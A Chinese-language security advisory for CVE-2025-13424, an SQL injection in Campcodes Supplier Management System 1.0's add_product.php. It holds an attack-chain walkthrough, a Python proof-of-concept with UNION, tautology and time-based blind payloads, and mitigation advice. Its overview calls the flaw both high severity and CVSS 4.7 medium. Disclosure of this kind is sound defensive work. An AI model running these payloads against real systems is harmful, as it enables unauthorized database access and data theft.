CVE-2025-13424 Campcodes供应商管理系统SQL注入漏洞

漏洞信息

漏洞编号

CVE-2025-13424

漏洞类型

SQL注入

CVSS评分

4.7 中危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

Campcodes Supplier Management System 1.0

漏洞概述

CVE-2025-13424是Campcodes供应商管理系统1.0版本中存在的一个高危SQL注入漏洞。该漏洞位于管理后台的add_product.php文件中，攻击者可以通过操纵txtProductName参数执行恶意SQL语句。由于该漏洞需要高权限认证才能利用（PR:H），但一旦成功，攻击者可获取数据库敏感信息、修改数据甚至在某些情况下实现远程代码执行。该漏洞于2025年11月20日披露，CVSS评分4.7，属于中等严重程度。漏洞利用代码已在公开渠道流传，厂商尚未发布官方修复补丁。建议管理员尽快采取临时缓解措施，并关注厂商后续安全更新。

技术细节

漏洞存在于/admin/add_product.php文件对txtProductName参数的处理过程中。程序在构建SQL查询时未对用户输入进行充分的参数化过滤或转义处理，导致攻击者可通过构造特定的SQL payloads实现注入攻击。攻击者需要具有管理员权限才能访问该功能模块（PR:H），但成功利用后可执行任意SQL命令。由于系统部署在Web服务器上（AV:N），攻击者可通过网络远程发起攻击。典型的利用方式包括：使用UNION SELECT提取数据库版本和用户信息、使用布尔型盲注逐字符获取敏感数据、或使用时间型盲注进行数据外带。修复方案应采用预编译语句（Prepared Statements）进行参数化查询，并严格限制数据库用户的权限。

攻击链分析

STEP 1

步骤1

攻击者访问目标网站的/admin/login.php登录页面

STEP 2

步骤2

使用有效的高权限管理员凭证登录系统

STEP 3

步骤3

导航到/admin/add_product.php产品添加页面

STEP 4

步骤4

在txtProductName参数中注入SQL payloads（如UNION SELECT或布尔盲注）

STEP 5

步骤5

提交表单，触发SQL注入漏洞执行恶意SQL语句

STEP 6

步骤6

通过SQL注入获取数据库敏感信息或执行进一步攻击

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-13424 SQL Injection PoC
# Target: Campcodes Supplier Management System 1.0
# File: /admin/add_product.php
# Parameter: txtProductName

import requests
import sys

target = "http://target.com"
login_url = f"{target}/admin/login.php"
add_product_url = f"{target}/admin/add_product.php"

# Admin credentials
credentials = {
    "username": "admin",
    "password": "admin"
}

# SQL Injection Payloads
payloads = [
    "test' OR '1'='1",
    "test' UNION SELECT NULL,@@version,NULL-- -",
    "test' AND (SELECT CASE WHEN (1=1) THEN SLEEP(5) ELSE 0 END)-- -"
]

def exploit():
    session = requests.Session()
    
    # Login as admin
    resp = session.post(login_url, data=credentials)
    if "login" in resp.text.lower():
        print("[-] Login failed")
        return
    print("[+] Login successful")
    
    # Send malicious payload
    for payload in payloads:
        data = {
            "txtProductName": payload,
            "txtProductPrice": "100",
            "txtProductCategory": "1",
            "btnSubmit": "Submit"
        }
        resp = session.post(add_product_url, data=data)
        print(f"[*] Payload sent: {payload}")
        if "error" not in resp.text.lower():
            print(f"[!] Potential vulnerability detected with payload: {payload}")

if __name__ == "__main__":
    exploit()

影响范围

Campcodes Supplier Management System 1.0

防御指南

临时缓解措施

在官方补丁发布前，可采取以下临时缓解措施：1) 使用WAF规则阻止包含SQL关键字的请求；2) 限制管理后台访问IP，仅允许可信IP段访问；3) 启用数据库审计日志，监控异常查询行为；4) 对/admin/add_product.php设置额外的访问控制；5) 考虑暂时禁用产品添加功能，待官方修复后再启用。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-13424
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-13424
3 Details https://www.cvedetails.com/cve/CVE-2025-13424/
4 VulDB https://vuldb.com/cve/CVE-2025-13424
5 Link https://github.com/arpcyber070/CVE/issues/3
6 Link https://vuldb.com/?ctiid.332946
7 Link https://vuldb.com/?id.332946
8 Link https://vuldb.com/?submit.696053
9 Link https://www.campcodes.com/
10 Link https://github.com/arpcyber070/CVE/issues/3